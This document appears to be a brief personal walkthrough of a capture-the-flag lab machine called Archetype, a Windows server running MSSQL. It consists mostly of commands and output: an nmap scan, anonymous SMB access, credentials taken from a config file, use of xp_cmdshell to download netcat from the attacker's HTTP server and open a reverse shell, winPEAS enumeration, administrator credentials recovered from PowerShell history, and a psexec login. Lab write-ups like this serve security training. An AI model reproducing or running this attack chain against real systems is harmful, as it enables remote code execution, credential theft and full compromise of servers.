Scanned target 10.129.42.158 with nmap.

─$ nmap -sVC 10.129.42.158                       
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 15:14 EET
Nmap scan report for 10.129.169.85
Host is up (0.18s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-02-28T13:14:44+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-02-28T13:11:53
|_Not valid after:  2053-02-28T13:11:53
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-02-28T13:14:37
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h00m01s, deviation: 4h00m02s, median: 0s
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-02-28T05:14:38-08:00
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.30 seconds

------------------------

used smbclient -N -L \\\\\\\\10.129.42.158\\\\\\
to find backups share that does not require password.

smbclient -N  \\\\\10.129.42.158\\backups 
to connect backup share

used dir-command to find out there is prod.dtsConfig file and downloaded it with GET prod.dtsConfig that revealed:
Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;

-------------------------

went in to the server with: python3 mssqlclient.py ARCHETYPE/sql_svc@10.129.42.158 -windows-auth


exec xp_cmdshell 'net user';
reconfigure
xp_cmdshell "whoami"

sudo python3 -m http.server 80
sudo nc -lvnp 443

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.114/nc64.exe -OutFile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.16.114 443"

---------------------------

Found user.txt file in desktop: ************

powershell
wget http://10.10.16.114/winPEASx64.exe -OutFile winPEASx64.exe
.\winPEASx64.exe

---------------------------

cd ..\
cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
dir
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

----------------------------

python3 psexec.py administrator@10.129.42.158
***********

found root.txt in administator/desktop: **************




